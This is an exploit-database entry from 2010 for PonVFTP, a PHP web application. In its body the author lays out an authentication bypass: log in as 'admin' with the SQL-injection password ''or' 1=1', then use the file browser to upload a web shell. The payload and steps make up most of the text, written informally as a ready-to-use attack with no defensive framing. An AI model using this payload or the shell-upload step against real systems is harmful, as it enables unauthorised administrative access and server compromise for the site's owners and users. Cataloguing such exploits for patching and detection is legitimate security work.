PonVFTP - Bypass / Arbitrary File Upload

EDB-ID:

11148

CVE:

N/A


Author:

S2K9

Type:

webapps


Platform:

PHP

Date:

2010-01-15


in the name of allah

# Exploit Title: PonVFTP Bbypass Vulnerability
# Date: 15/1/2010

# Author:S2K9

# Site: www.soqor.net , www.xp10.me

# Software home: http://pongles.com/index.php

# Tested on: windows xp sp2

Dork :in u r dream

exploit : press login >>>
username : admin
password : 'or' 1=1
press in
yaaaaay u r in hehe
good look
go to browse and upload your shell

Greetz : R3d-D3v!L <<< my teacher and every Muslim hacker